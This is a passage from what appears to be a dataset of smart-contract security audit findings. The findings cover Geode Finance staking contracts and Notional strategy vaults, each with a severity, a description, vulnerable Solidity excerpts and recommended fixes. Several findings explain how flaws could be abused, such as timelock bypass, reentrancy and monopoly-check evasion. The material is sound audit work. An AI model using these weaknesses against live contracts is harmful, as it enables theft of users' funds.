which will make this call revert because the `_refreshSenate` function has the `whenNotPaused` modifier. Thus maintainer could intentionally prevent the controller from replacing it by another maintainer.",Make sure that the controller can always change the malicious maintainer.,,"```\\nfunction changeMaintainer(\\n bytes calldata password,\\n bytes32 newPasswordHash,\\n address newMaintainer\\n)\\n external\\n virtual\\n override\\n onlyPortal\\n whenNotPaused\\n returns (bool success)\\n{\\n require(\\n SELF.PASSWORD\\_HASH == bytes32(0) ||\\n SELF.PASSWORD\\_HASH ==\\n keccak256(abi.encodePacked(SELF.ID, password))\\n );\\n SELF.PASSWORD\\_HASH = newPasswordHash;\\n\\n \\_refreshSenate(newMaintainer);\\n\\n success = true;\\n}\\n```\\n" +Entities are not required to be initiated,medium,"Every entity (Planet, Comet, Operator) has a 3-step creation process:\\nCreation of the proposal.\\nApproval of the proposal.\\nInitiation of the entity.\\nThe last step is crucial, but it is never explicitly checked that the entity is initialized. The initiation always includes the `initiator` modifier that works with the `""initiated""` slot on DATASTORE:\\n```\\nmodifier initiator(\\n DataStoreUtils.DataStore storage DATASTORE,\\n uint256 \\_TYPE,\\n uint256 \\_id,\\n address \\_maintainer\\n) {\\n require(\\n msg.sender == DATASTORE.readAddressForId(\\_id, ""CONTROLLER""),\\n ""MaintainerUtils: sender NOT CONTROLLER""\\n );\\n require(\\n DATASTORE.readUintForId(\\_id, ""TYPE"") == \\_TYPE,\\n ""MaintainerUtils: id NOT correct TYPE""\\n );\\n require(\\n DATASTORE.readUintForId(\\_id, ""initiated"") == 0,\\n ""MaintainerUtils: already initiated""\\n );\\n\\n DATASTORE.writeAddressForId(\\_id, ""maintainer"", \\_maintainer);\\n\\n \\_;\\n\\n DATASTORE.writeUintForId(\\_id, ""initiated"", block.timestamp);\\n\\n emit IdInitiated(\\_id, \\_TYPE);\\n}\\n```\\n\\nBut this slot is never actually checked when the entities are used. While we did not find any profitable attack vector using uninitiated entities, the code will be upgraded, which may allow for possible attack vectors related to this issue.",Make sure the entities are initiated before they are used.,,"```\\nmodifier initiator(\\n DataStoreUtils.DataStore storage DATASTORE,\\n uint256 \\_TYPE,\\n uint256 \\_id,\\n address \\_maintainer\\n) {\\n require(\\n msg.sender == DATASTORE.readAddressForId(\\_id, ""CONTROLLER""),\\n ""MaintainerUtils: sender NOT CONTROLLER""\\n );\\n require(\\n DATASTORE.readUintForId(\\_id, ""TYPE"") == \\_TYPE,\\n ""MaintainerUtils: id NOT correct TYPE""\\n );\\n require(\\n DATASTORE.readUintForId(\\_id, ""initiated"") == 0,\\n ""MaintainerUtils: already initiated""\\n );\\n\\n DATASTORE.writeAddressForId(\\_id, ""maintainer"", \\_maintainer);\\n\\n \\_;\\n\\n DATASTORE.writeUintForId(\\_id, ""initiated"", block.timestamp);\\n\\n emit IdInitiated(\\_id, \\_TYPE);\\n}\\n```\\n" +The blameOperator can be called for an alienated validator,medium,"The `blameOperator` function is designed to be called by anyone. If some operator did not signal to exit in time, anyone can blame and imprison this operator.\\n```\\n/\\*\\*\\n \\* @notice allows improsening an Operator if the validator have not been exited until expectedExit\\n \\* @dev anyone can call this function\\n \\* @dev if operator has given enough allowence, they can rotate the validators to avoid being prisoned\\n \\*/\\nfunction blameOperator(\\n StakePool storage self,\\n DataStoreUtils.DataStore storage DATASTORE,\\n bytes calldata pk\\n) external {\\n if (\\n block.timestamp > self.TELESCOPE.\\_validators[pk].expectedExit &&\\n self.TELESCOPE.\\_validators[pk].state != 3\\n ) {\\n OracleUtils.imprison(\\n DATASTORE,\\n self.TELESCOPE.\\_validators[pk].operatorId\\n );\\n }\\n}\\n```\\n\\nThe problem is that it can be called for any state that is not `3` (self.TELESCOPE._validators[pk].state != 3). But it should only be called for active validators whose state equals `2`. So the `blameOperator` can be called an infinite amount of time for alienated or not approved validators. These types of validators cannot switch to state `3`.\\nThe severity of the issue is mitigated by the fact that this function is currently unavailable for users to call. But it is intended to be external once the withdrawal process is in place.",Make sure that you can only blame the operator of an active validator.,,"```\\n/\\*\\*\\n \\* @notice allows improsening an Operator if the validator have not been exited until expectedExit\\n \\* @dev anyone can call this function\\n \\* @dev if operator has given enough allowence, they can rotate the validators to avoid being prisoned\\n \\*/\\nfunction blameOperator(\\n StakePool storage self,\\n DataStoreUtils.DataStore storage DATASTORE,\\n bytes calldata pk\\n) external {\\n if (\\n block.timestamp > self.TELESCOPE.\\_validators[pk].expectedExit &&\\n self.TELESCOPE.\\_validators[pk].state != 3\\n ) {\\n OracleUtils.imprison(\\n DATASTORE,\\n self.TELESCOPE.\\_validators[pk].operatorId\\n );\\n }\\n}\\n```\\n" +Latency timelocks on certain functions can be bypassed,medium,"The functions `switchMaintainerFee()` and `switchWithdrawalBoost()` add a latency of typically three days to the current timestamp at which the new value is meant to be valid. However, they don't limit the number of times this value can be changed within the latency period. This allows a malicious maintainer to set their desired value twice and effectively make the change immediately. Let's take the first function as an example. The first call to it sets a value as the `newFee`, moving the old value to `priorFee`, which is effectively the fee in use until the time lock is up. A follow-up call to the function with the same value as a parameter would mean the “new” value overwrites the old `priorFee` while remaining in the queue for the switch.\\n```\\nfunction switchMaintainerFee(\\n DataStoreUtils.DataStore storage DATASTORE,\\n uint256 id,\\n uint256 newFee\\n) external {\\n DATASTORE.writeUintForId(\\n id,\\n ""priorFee"",\\n DATASTORE.readUintForId(id, ""fee"")\\n );\\n DATASTORE.writeUintForId(\\n id,\\n ""feeSwitch"",\\n block.timestamp + FEE\\_SWITCH\\_LATENCY\\n );\\n DATASTORE.writeUintForId(id, ""fee"", newFee);\\n\\n emit MaintainerFeeSwitched(\\n id,\\n newFee,\\n block.timestamp + FEE\\_SWITCH\\_LATENCY\\n );\\n}\\n```\\n\\n```\\nfunction getMaintainerFee(\\n DataStoreUtils.DataStore storage DATASTORE,\\n uint256 id\\n) internal view returns (uint256 fee) {\\n if (DATASTORE.readUintForId(id, ""feeSwitch"") > block.timestamp) {\\n return DATASTORE.readUintForId(id, ""priorFee"");\\n }\\n return DATASTORE.readUintForId(id, ""fee"");\\n}\\n```\\n",Add a check to make sure only one value can be set between time lock periods.,,"```\\nfunction switchMaintainerFee(\\n DataStoreUtils.DataStore storage DATASTORE,\\n uint256 id,\\n uint256 newFee\\n) external {\\n DATASTORE.writeUintForId(\\n id,\\n ""priorFee"",\\n DATASTORE.readUintForId(id, ""fee"")\\n );\\n DATASTORE.writeUintForId(\\n id,\\n ""feeSwitch"",\\n block.timestamp + FEE\\_SWITCH\\_LATENCY\\n );\\n DATASTORE.writeUintForId(id, ""fee"", newFee);\\n\\n emit MaintainerFeeSwitched(\\n id,\\n newFee,\\n block.timestamp + FEE\\_SWITCH\\_LATENCY\\n );\\n}\\n```\\n" +MiniGovernance's senate has almost unlimited validity,medium,"A new senate for the MiniGovernance contract is set in the following line:\\n```\\nGEM.\\_setSenate(newSenate, block.timestamp + SENATE\\_VALIDITY);\\n```\\n\\nThe validity period argument should not include `block.timestamp`, because it is going to be added a bit later in the code:\\n```\\nself.SENATE\\_EXPIRY = block.timestamp + \\_senatePeriod;\\n```\\n\\nSo currently, every senate of MiniGovernance will have much longer validity than it is supposed to.",Pass onlySENATE_VALIDITY in the `_refreshSenate` function.,,"```\\nGEM.\\_setSenate(newSenate, block.timestamp + SENATE\\_VALIDITY);\\n```\\n" +Proposed validators not accounted for in the monopoly check.,medium,"The Geode team introduced a check that makes sure that node operators do not initiate more validators than a threshold called `MONOPOLY_THRESHOLD` allows. It is used on call to `proposeStake(...)` which the operator would call in order to propose new validators. It is worth mentioning that onboarding new validator nodes requires 2 steps: a proposal from the node operator and approval from the planet maintainer. After the first step validators get a status of `proposed`. After the second step validators get the status of `active` and all eth accounting is done. The issue we found is that the `proposed` validators step performs the monopoly check but does not account for previously `proposed` but not `active` validators.\\nAssume that `MONOPOLY_THRESHOLD` is set to 5. The node operator could propose 4 new validators and pass the monopoly check and label those validators as `proposed`. The node operator could then suggest 4 more validators in a separate transaction and since the monopoly check does not check for the `proposed` validators, that would pass as well. Then in `beaconStake` or the step of maintainer approval, there is no monopoly check at all, so 8 validators could be activated at once.\\n```\\nrequire(\\n (DATASTORE.readUintForId(operatorId, ""totalActiveValidators"") +\\n pubkeys.length) <= self.TELESCOPE.MONOPOLY\\_THRESHOLD,\\n ""StakeUtils: IceBear does NOT like monopolies""\\n);\\n```\\n","Include the `(DATASTORE.readUintForId(poolId,DataStoreUtils.getKey(operatorId, ""proposedValidators""))` into the require statement, just like in the check for the node operator allowance check.\\n```\\nrequire(\\n (DATASTORE.readUintForId(\\n poolId,\\n DataStoreUtils.getKey(operatorId, ""proposedValidators"")\\n ) +\\n DATASTORE.readUintForId(\\n poolId,\\n DataStoreUtils.getKey(operatorId, ""activeValidators"")\\n ) +\\n pubkeys.length) <=\\n operatorAllowance(DATASTORE, poolId, operatorId),\\n ""StakeUtils: NOT enough allowance""\\n);\\n```\\n",,"```\\nrequire(\\n (DATASTORE.readUintForId(operatorId, ""totalActiveValidators"") +\\n pubkeys.length) <= self.TELESCOPE.MONOPOLY\\_THRESHOLD,\\n ""StakeUtils: IceBear does NOT like monopolies""\\n);\\n```\\n" +Comparison operator used instead of assignment operator,medium,```\\nself.\\_validators[\\_pk].state == 2;\\n```\\n\\n```\\nself.\\_validators[\\_pk].state == 3;\\n```\\n,Replace `==` with `=`.,,```\\nself.\\_validators[\\_pk].state == 2;\\n```\\n +initiator modifier will not work in the context of one transaction,low,"Each planet, comet or operator must be initialized after the onboarding proposal is approved. In order to make sure that these entities are not initialized more than once `initiateOperator`, `initiateComet` and `initiatePlanet` have the `initiator` modifier.\\n```\\nfunction initiatePlanet(\\n DataStoreUtils.DataStore storage DATASTORE,\\n uint256[3] memory uintSpecs,\\n address[5] memory addressSpecs,\\n string[2] calldata interfaceSpecs\\n)\\n external\\n initiator(DATASTORE, 5, uintSpecs[0], addressSpecs[1])\\n returns (\\n address miniGovernance,\\n address gInterface,\\n address withdrawalPool\\n )\\n```\\n\\n```\\nfunction initiateComet(\\n DataStoreUtils.DataStore storage DATASTORE,\\n uint256 id,\\n uint256 fee,\\n address maintainer\\n) external initiator(DATASTORE, 6, id, maintainer) {\\n```\\n\\n```\\nfunction initiateOperator(\\n DataStoreUtils.DataStore storage DATASTORE,\\n uint256 id,\\n uint256 fee,\\n address maintainer\\n) external initiator(DATASTORE, 4, id, maintainer) {\\n```\\n\\nInside that modifier, we check that the `initiated` flag is 0 and if so we proceed to initialization. We later update it to the current timestamp.\\n```\\nmodifier initiator(\\n DataStoreUtils.DataStore storage DATASTORE,\\n uint256 \\_TYPE,\\n uint256 \\_id,\\n address \\_maintainer\\n) {\\n require(\\n msg.sender == DATASTORE.readAddressForId(\\_id, ""CONTROLLER""),\\n ""MaintainerUtils: sender NOT CONTROLLER""\\n );\\n require(\\n DATASTORE.readUintForId(\\_id, ""TYPE"") == \\_TYPE,\\n ""MaintainerUtils: id NOT correct TYPE""\\n );\\n require(\\n DATASTORE.readUintForId(\\_id, ""initiated"") == 0,\\n ""MaintainerUtils: already initiated""\\n );\\n\\n DATASTORE.writeAddressForId(\\_id, ""maintainer"", \\_maintainer);\\n\\n \\_;\\n\\n DATASTORE.writeUintForId(\\_id, ""initiated"", block.timestamp);\\n\\n emit IdInitiated(\\_id, \\_TYPE);\\n}\\n```\\n\\nUnfortunately, this does not follow the checks-effects-interractions pattern. If one for example would call `initiatePlanet` again from the body of the modifier, this check will still pass making it susceptible to a reentrancy attack. While we could not find a way to exploit this in the current engagement, given that system is designed to be upgradable this could become a risk in the future. For example, if during the initialization of the planet the maintainer will be allowed to pass a custom interface that could potentially allow reentering.","Bring the line that updated the `initiated` flag to the current timestamp before the `_;`.\\n```\\nDATASTORE.writeUintForId(\\_id, ""initiated"", block.timestamp);\\n```\\n",,"```\\nfunction initiatePlanet(\\n DataStoreUtils.DataStore storage DATASTORE,\\n uint256[3] memory uintSpecs,\\n address[5] memory addressSpecs,\\n string[2] calldata interfaceSpecs\\n)\\n external\\n initiator(DATASTORE, 5, uintSpecs[0], addressSpecs[1])\\n returns (\\n address miniGovernance,\\n address gInterface,\\n address withdrawalPool\\n )\\n```\\n" +Incorrect accounting for the burned gEth,low,"Geode Portal records the amount of minted and burned gETH on any given day during the active period of the oracle. One case where some gETH is burned is when the users redeem gETH for ETH. In the burn function we burn the spentGeth - `gEthDonation` but in the accounting code we do not account for `gEthDonation` so the code records more assets burned than was really burned.\\n```\\nDATASTORE.subUintForId(poolId, ""surplus"", spentSurplus);\\nself.gETH.burn(address(this), poolId, spentGeth - gEthDonation);\\n\\nif (self.TELESCOPE.\\_isOracleActive()) {\\n bytes32 dailyBufferKey = DataStoreUtils.getKey(\\n block.timestamp - (block.timestamp % OracleUtils.ORACLE\\_PERIOD),\\n ""burnBuffer""\\n );\\n DATASTORE.addUintForId(poolId, dailyBufferKey, spentGeth);\\n}\\n```\\n","Record the `spentGeth` - gEthDonation instead of just `spentGeth` in the burn buffer.\\n```\\nDATASTORE.addUintForId(poolId, dailyBufferKey, spentGeth);\\n```\\n",,"```\\nDATASTORE.subUintForId(poolId, ""surplus"", spentSurplus);\\nself.gETH.burn(address(this), poolId, spentGeth - gEthDonation);\\n\\nif (self.TELESCOPE.\\_isOracleActive()) {\\n bytes32 dailyBufferKey = DataStoreUtils.getKey(\\n block.timestamp - (block.timestamp % OracleUtils.ORACLE\\_PERIOD),\\n ""burnBuffer""\\n );\\n DATASTORE.addUintForId(poolId, dailyBufferKey, spentGeth);\\n}\\n```\\n" +Boost calculation on fetchUnstake should not be using the cumBalance when it is larger than debt.,low,"The Geode team implemented the 2-step withdrawal mechanism for the staked ETH. First, node operators signal their intent to withdraw the stake, and then the oracle will trigger all of the accounting of rewards, balances, and buybacks if necessary. Buybacks are what we are interested in at this time. Buybacks are performed by checking if the derivative asset is off peg in the Dynamic Withdrawal Pool contract. Once the debt is larger than some ignorable threshold an arbitrage buyback will be executed. A portion of the arbitrage profit will go to the node operator. The issue here is that when simulating the arbitrage swap in the `calculateSwap` call we use the cumulative un-stake balance rather than ETH debt preset in the DWP. In the case where the withdrawal cumulative balance is higher than the debt node operator will receive a higher reward than intended.\\n```\\nuint256 arb = withdrawalPoolById(DATASTORE, poolId)\\n .calculateSwap(0, 1, cumBal);\\n```\\n",Use the `debt` amount of ETH in the boost reward calculation when the cumulative balance is larger than the `debt`.,,"```\\nuint256 arb = withdrawalPoolById(DATASTORE, poolId)\\n .calculateSwap(0, 1, cumBal);\\n```\\n" +DataStore struct not having the _gap for upgrades.,low,"```\\nDataStoreUtils.DataStore private DATASTORE;\\nGeodeUtils.Universe private GEODE;\\nStakeUtils.StakePool private STAKEPOOL;\\n```\\n\\nIt is worth mentioning that Geode contracts are meant to support the upgradability pattern. Given that information, one should be careful not to overwrite the storage variables by reordering the old ones or adding the new once not at the end of the list of variables when upgrading. The issue comes with the fact that structs seem to give a false sense of security making it feel like they are an isolated set of storage variables that will not override anything else. In reality, struts are just tuples that are expanded in storage sequentially just like all the other storage variables. For that reason, if you have two struct storage variables listed back to back like in the code above, you either need to make sure not to change the order or the number of variables in the structs other than the last one between upgrades or you need to add a `uint256[N] _gap` array of fixed size to reserve some storage slots for the future at the end of each struct. The Geode Finance team is missing the gap in the `DataStrore` struct making it non-upgradable.\\n```\\nstruct DataStore {\\n mapping(uint256 => uint256[]) allIdsByType;\\n mapping(bytes32 => uint256) uintData;\\n mapping(bytes32 => bytes) bytesData;\\n mapping(bytes32 => address) addressData;\\n}\\n```\\n",We suggest that gap is used in DataStore as well. Since it was used for all the other structs we consider it just a typo.,,```\\nDataStoreUtils.DataStore private DATASTORE;\\nGeodeUtils.Universe private GEODE;\\nStakeUtils.StakePool private STAKEPOOL;\\n```\\n +Handle division by 0,medium,"There are a few places in the code where division by zero may occur but isn't handled.\\nIf the vault settles at exactly 0 value with 0 remaining strategy token value, there may be an unhandled division by zero trying to divide claims on the settled assets:\\n```\\nint256 settledVaultValue = settlementRate.convertToUnderlying(residualAssetCashBalance)\\n .add(totalStrategyTokenValueAtSettlement);\\n\\n// If the vault is insolvent (meaning residualAssetCashBalance < 0), it is necessarily\\n// true that totalStrategyTokens == 0 (meaning all tokens were sold in an attempt to\\n// repay the debt). That means settledVaultValue == residualAssetCashBalance, strategyTokenClaim == 0\\n// and assetCashClaim == totalAccountValue. Accounts that are still solvent will be paid from the\\n// reserve, accounts that are insolvent will have a totalAccountValue == 0.\\nstrategyTokenClaim = totalAccountValue.mul(vaultState.totalStrategyTokens.toInt())\\n .div(settledVaultValue).toUint();\\n\\nassetCashClaim = totalAccountValue.mul(residualAssetCashBalance)\\n .div(settledVaultValue);\\n```\\n\\nIf a vault account is entirely insolvent and its `vaultShareValue` is zero, there will be an unhandled division by zero during liquidation:\\n```\\nuint256 vaultSharesToLiquidator;\\n{\\n vaultSharesToLiquidator = vaultAccount.tempCashBalance.toUint()\\n .mul(vaultConfig.liquidationRate.toUint())\\n .mul(vaultAccount.vaultShares)\\n .div(vaultShareValue.toUint())\\n .div(uint256(Constants.RATE\\_PRECISION));\\n}\\n```\\n\\nIf a vault account's secondary debt is being repaid when there is none, there will be an unhandled division by zero:\\n```\\nVaultSecondaryBorrowStorage storage balance =\\n LibStorage.getVaultSecondaryBorrow()[vaultConfig.vault][maturity][currencyId];\\nuint256 totalfCashBorrowed = balance.totalfCashBorrowed;\\nuint256 totalAccountDebtShares = balance.totalAccountDebtShares;\\n\\nfCashToLend = debtSharesToRepay.mul(totalfCashBorrowed).div(totalAccountDebtShares).toInt();\\n```\\n\\nWhile these cases may be unlikely today, this code could be reutilized in other circumstances later that could cause reverts and even disrupt operations more frequently.",Handle the cases where the denominator could be zero appropriately.,,"```\\nint256 settledVaultValue = settlementRate.convertToUnderlying(residualAssetCashBalance)\\n .add(totalStrategyTokenValueAtSettlement);\\n\\n// If the vault is insolvent (meaning residualAssetCashBalance < 0), it is necessarily\\n// true that totalStrategyTokens == 0 (meaning all tokens were sold in an attempt to\\n// repay the debt). That means settledVaultValue == residualAssetCashBalance, strategyTokenClaim == 0\\n// and assetCashClaim == totalAccountValue. Accounts that are still solvent will be paid from the\\n// reserve, accounts that are insolvent will have a totalAccountValue == 0.\\nstrategyTokenClaim = totalAccountValue.mul(vaultState.totalStrategyTokens.toInt())\\n .div(settledVaultValue).toUint();\\n\\nassetCashClaim = totalAccountValue.mul(residualAssetCashBalance)\\n .div(settledVaultValue);\\n```\\n" +Increasing a leveraged position in a vault with secondary borrow currency will revert,low,"From the client's specifications for the strategy vaults, we know that accounts should be able to increase their leveraged positions before maturity. This property will not hold for the vaults that require borrowing a secondary currency to enter a position. When an account opens its position in such vault for the first time, the `VaultAccountSecondaryDebtShareStorage.maturity` is set to the maturity an account has entered. When the account is trying to increase the debt position, an accounts current maturity will be checked, and since it is not set to 0, as in the case where an account enters the vault for the first time, nor it is smaller than the new maturity passed by an account as in case of a rollover, the code will revert.\\n```\\nif (accountMaturity != 0) {\\n // Cannot roll to a shorter term maturity\\n require(accountMaturity < maturity);\\n```\\n","In order to fix this issue, we recommend that `<` is replaced with `<=` so that account can enter the vault maturity the account is already in as well as the future once.",,```\\nif (accountMaturity != 0) {\\n // Cannot roll to a shorter term maturity\\n require(accountMaturity < maturity);\\n```\\n +Secondary Currency debt is not managed by the Notional Controller,low,"Some of the Notional Strategy Vaults may allow for secondary currencies to be borrowed as part of the same strategy. For example, a strategy may allow for USDC to be its primary borrow currency as well as have ETH as its secondary borrow currency.\\nIn order to enter the vault, a user would have to deposit `depositAmountExternal` of the primary borrow currency when calling `VaultAccountAction.enterVault()`. This would allow the user to borrow with leverage, as long as the `vaultConfig.checkCollateralRatio()` check on that account succeeds, which is based on the initial deposit and borrow currency amounts. This collateral ratio check is then performed throughout that user account's lifecycle in that vault, such as when they try to roll their maturity, or when liquidators try to perform collateral checks to ensure there is no bad debt.\\nHowever, in the event that the vault has a secondary borrow currency as well, that additional secondary debt is not calculated as part of the `checkCollateralRatio()` check. The only debt that is being considered is the `vaultAccount.fCash` that corresponds to the primary borrow currency debt:\\n```\\nfunction checkCollateralRatio(\\n VaultConfig memory vaultConfig,\\n VaultState memory vaultState,\\n VaultAccount memory vaultAccount\\n) internal view {\\n (int256 collateralRatio, /\\* \\*/) = calculateCollateralRatio(\\n vaultConfig, vaultState, vaultAccount.account, vaultAccount.vaultShares, vaultAccount.fCash\\n```\\n\\n```\\nfunction calculateCollateralRatio(\\n VaultConfig memory vaultConfig,\\n VaultState memory vaultState,\\n address account,\\n uint256 vaultShares,\\n int256 fCash\\n) internal view returns (int256 collateralRatio, int256 vaultShareValue) {\\n vaultShareValue = vaultState.getCashValueOfShare(vaultConfig, account, vaultShares);\\n\\n // We do not discount fCash to present value so that we do not introduce interest\\n // rate risk in this calculation. The economic benefit of discounting will be very\\n // minor relative to the added complexity of accounting for interest rate risk.\\n\\n // Convert fCash to a positive amount of asset cash\\n int256 debtOutstanding = vaultConfig.assetRate.convertFromUnderlying(fCash.neg());\\n```\\n\\nWhereas the value of strategy tokens that belong to that user account are being calculated by calling `IStrategyVault(vault).convertStrategyToUnderlying()` on the associated strategy vault:\\n```\\nfunction getCashValueOfShare(\\n VaultState memory vaultState,\\n VaultConfig memory vaultConfig,\\n address account,\\n uint256 vaultShares\\n) internal view returns (int256 assetCashValue) {\\n if (vaultShares == 0) return 0;\\n (uint256 assetCash, uint256 strategyTokens) = getPoolShare(vaultState, vaultShares);\\n int256 underlyingInternalStrategyTokenValue = \\_getStrategyTokenValueUnderlyingInternal(\\n vaultConfig.borrowCurrencyId, vaultConfig.vault, account, strategyTokens, vaultState.maturity\\n );\\n```\\n\\n```\\nfunction \\_getStrategyTokenValueUnderlyingInternal(\\n uint16 currencyId,\\n address vault,\\n address account,\\n uint256 strategyTokens,\\n uint256 maturity\\n) private view returns (int256) {\\n Token memory token = TokenHandler.getUnderlyingToken(currencyId);\\n // This will be true if the the token is ""NonMintable"" meaning that it does not have\\n // an underlying token, only an asset token\\n if (token.decimals == 0) token = TokenHandler.getAssetToken(currencyId);\\n\\n return token.convertToInternal(\\n IStrategyVault(vault).convertStrategyToUnderlying(account, strategyTokens, maturity)\\n );\\n}\\n```\\n\\nFrom conversations with the Notional team, it is assumed that this call returns the strategy token value subtracted against the secondary currencies debt, as is the case in the `Balancer2TokenVault` for example. In other words, when collateral ratio checks are performed, those strategy vaults that utilize secondary currency borrows would need to calculate the value of strategy tokens already accounting for any secondary debt. However, this is a dependency for a critical piece of the Notional controller's strategy vaults collateral checks.\\nTherefore, even though the strategy vaults' code and logic would be vetted before their whitelisting into the Notional system, they would still remain an external dependency with relatively arbitrary code responsible for the liquidation infrastructure that could lead to bad debt or incorrect liquidations if the vaults give inaccurate information, and thus potential loss of funds.","Specific strategy vault implementations using secondary borrows were not in scope of this audit. However, since the core Notional Vault system was, and it includes secondary borrow currency functionality, from the point of view of the larger Notional system it is recommended to include secondary debt checks within the Notional controller contract to reduce external dependency on the strategy vaults' logic.",,"```\\nfunction checkCollateralRatio(\\n VaultConfig memory vaultConfig,\\n VaultState memory vaultState,\\n VaultAccount memory vaultAccount\\n) internal view {\\n (int256 collateralRatio, /\\* \\*/) = calculateCollateralRatio(\\n vaultConfig, vaultState, vaultAccount.account, vaultAccount.vaultShares, vaultAccount.fCash\\n```\\n" +Vaults are unable to borrow single secondary currency,low,"As was previously mentioned some strategies `require` borrowing one or two secondary currencies. All secondary currencies have to be whitelisted in the `VaultConfig.secondaryBorrowCurrencies`. Borrow operation on secondary currencies is performed in the `borrowSecondaryCurrencyToVault(...)` function. Due to a `require` statement in that function, vaults will only be able to borrow secondary currencies if both of the currencies are whitelisted in `VaultConfig.secondaryBorrowCurrencies`. Considering that many strategies will have just one secondary currency, this will prevent those strategies from borrowing any secondary assets.\\n```\\nrequire(currencies[0] != 0 && currencies[1] != 0);\\n```\\n","We suggest that the `&&` operator is replaced by the `||` operator. Ideally, an additional check will be performed that will ensure that values in argument arrays `fCashToBorrow`, `maxBorrowRate`, and `minRollLendRate` are passed under the same index as the whitelisted currencies in `VaultConfig.secondaryBorrowCurrencies`.\\n```\\nfunction borrowSecondaryCurrencyToVault(\\n address account,\\n uint256 maturity,\\n uint256[2] calldata fCashToBorrow,\\n uint32[2] calldata maxBorrowRate,\\n uint32[2] calldata minRollLendRate\\n) external override returns (uint256[2] memory underlyingTokensTransferred) {\\n```\\n",,```\\nrequire(currencies[0] != 0 && currencies[1] != 0);\\n```\\n +An account roll may be impossible if the vault is already at the maximum borrow capacity.,low,"One of the actions allowed in Notional Strategy Vaults is to roll an account's maturity to a later one by borrowing from a later maturity and repaying that into the debt of the earlier maturity.\\nHowever, this could cause an issue if the vault is at maximum capacity at the time of the roll. When an account performs this type of roll, the new borrow would have to be more than the existing debt simply because it has to at least cover the existing debt and pay for the borrow fees that get added on every new borrow. Since the whole vault was already at max borrow capacity before with the old, smaller borrow, this process would revert at the end after the new borrow as well once the process gets to `VaultAccount.updateAccountfCash` and VaultConfiguration.updateUsedBorrowCapacity:\\n```\\nfunction updateUsedBorrowCapacity(\\n address vault,\\n uint16 currencyId,\\n int256 netfCash\\n) internal returns (int256 totalUsedBorrowCapacity) {\\n VaultBorrowCapacityStorage storage cap = LibStorage.getVaultBorrowCapacity()[vault][currencyId];\\n\\n // Update the total used borrow capacity, when borrowing this number will increase (netfCash < 0),\\n // when lending this number will decrease (netfCash > 0).\\n totalUsedBorrowCapacity = int256(uint256(cap.totalUsedBorrowCapacity)).sub(netfCash);\\n if (netfCash < 0) {\\n // Always allow lending to reduce the total used borrow capacity to satisfy the case when the max borrow\\n // capacity has been reduced by governance below the totalUsedBorrowCapacity. When borrowing, it cannot\\n // go past the limit.\\n require(totalUsedBorrowCapacity <= int256(uint256(cap.maxBorrowCapacity)), ""Max Capacity"");\\n```\\n\\nThe result is that users won't able to roll while the vault is at max capacity. However, users may exit some part of their position to reduce their borrow, thereby reducing the overall vault borrow capacity, and then could execute the roll. A bigger problem would occur if the vault configuration got updated to massively reduce the borrow capacity, which would force users to exit their position more significantly with likely a much smaller chance at being able to roll.","Document this case so that users can realise that rolling may not always be an option. Perhaps consider adding ways where users can pay a small deposit, like on `enterVault`, to offset the additional difference in borrows and pay for fees so they can remain with essentially the same size position within Notional.",,"```\\nfunction updateUsedBorrowCapacity(\\n address vault,\\n uint16 currencyId,\\n int256 netfCash\\n) internal returns (int256 totalUsedBorrowCapacity) {\\n VaultBorrowCapacityStorage storage cap = LibStorage.getVaultBorrowCapacity()[vault][currencyId];\\n\\n // Update the total used borrow capacity, when borrowing this number will increase (netfCash < 0),\\n // when lending this number will decrease (netfCash > 0).\\n totalUsedBorrowCapacity = int256(uint256(cap.totalUsedBorrowCapacity)).sub(netfCash);\\n if (netfCash < 0) {\\n // Always allow lending to reduce the total used borrow capacity to satisfy the case when the max borrow\\n // capacity has been reduced by governance below the totalUsedBorrowCapacity. When borrowing, it cannot\\n // go past the limit.\\n require(totalUsedBorrowCapacity <= int256(uint256(cap.maxBorrowCapacity)), ""Max Capacity"");\\n```\\n" +Rollover might introduce economically impractical deposits of dust into a strategy,low,"During the rollover of the strategy position into a longer maturity, several things happen:\\nFunds are borrowed from the longer maturity to pay off the debt and fees of the current maturity.\\nStrategy tokens that are associated with the current maturity are moved to the new maturity.\\nAny additional funds provided by the account are deposited into the strategy into a new longer maturity.\\nIn reality, due to the AMM nature of the protocol, the funds borrowed from the new maturity could exceed the debt the account has in the current maturity, resulting in a non-zero `vaultAccount.tempCashBalance`. In that case, those funds will be deposited into the strategy. That would happen even if there are no external funds supplied by the account for the deposit.\\nIt is possible that the dust in the temporary account balance will not cover the gas cost of triggering a full deposit call of the strategy.\\n```\\nuint256 strategyTokensMinted = vaultConfig.deposit(\\n vaultAccount.account, vaultAccount.tempCashBalance, vaultState.maturity, additionalUnderlyingExternal, vaultData\\n);\\n```\\n",We suggest that additional checks are introduced that would check that on rollover `vaultAccount.tempCashBalance + additionalUnderlyingExternal > 0` or larger than a certain threshold like `minAccountBorrowSize` for example.,,"```\\nuint256 strategyTokensMinted = vaultConfig.deposit(\\n vaultAccount.account, vaultAccount.tempCashBalance, vaultState.maturity, additionalUnderlyingExternal, vaultData\\n);\\n```\\n" +Strategy vault swaps can be frontrun,low,"Some strategy vaults utilize borrowing one currency, swapping it for another, and then using the new currency somewhere to generate yield. For example, the CrossCurrencyfCash strategy vault could borrow USDC, swap it for DAI, and then deposit that DAI back into Notional if the DAI lending interest rates are greater than USDC borrowing interest rates. However, during vault settlement the assets would need to be swapped back into the original borrow currency.\\nSince these vaults control the borrowed assets that go only into white-listed strategies, the Notional system allows users to borrow multiples of their posted collateral and claim the yield from a much larger position. As a result, these strategy vaults would likely have significant funds being borrowed and managed into these strategies.\\nHowever, as mentioned above, these strategies usually utilize a trading mechanism to swap borrowed currencies into whatever is required by the strategy, and these trades may be quite large. In fact, the `BaseStrategyVault` implementation contains functions that interact with Notional's trading module to assist with those swaps:\\n```\\n/// @notice Can be used to delegate call to the TradingModule's implementation in order to execute\\n/// a trade.\\nfunction \\_executeTrade(\\n uint16 dexId,\\n Trade memory trade\\n) internal returns (uint256 amountSold, uint256 amountBought) {\\n (bool success, bytes memory result) = nProxy(payable(address(TRADING\\_MODULE))).getImplementation()\\n .delegatecall(abi.encodeWithSelector(ITradingModule.executeTrade.selector, dexId, trade));\\n require(success);\\n (amountSold, amountBought) = abi.decode(result, (uint256, uint256));\\n}\\n\\n/// @notice Can be used to delegate call to the TradingModule's implementation in order to execute\\n/// a trade.\\nfunction \\_executeTradeWithDynamicSlippage(\\n uint16 dexId,\\n Trade memory trade,\\n uint32 dynamicSlippageLimit\\n) internal returns (uint256 amountSold, uint256 amountBought) {\\n (bool success, bytes memory result) = 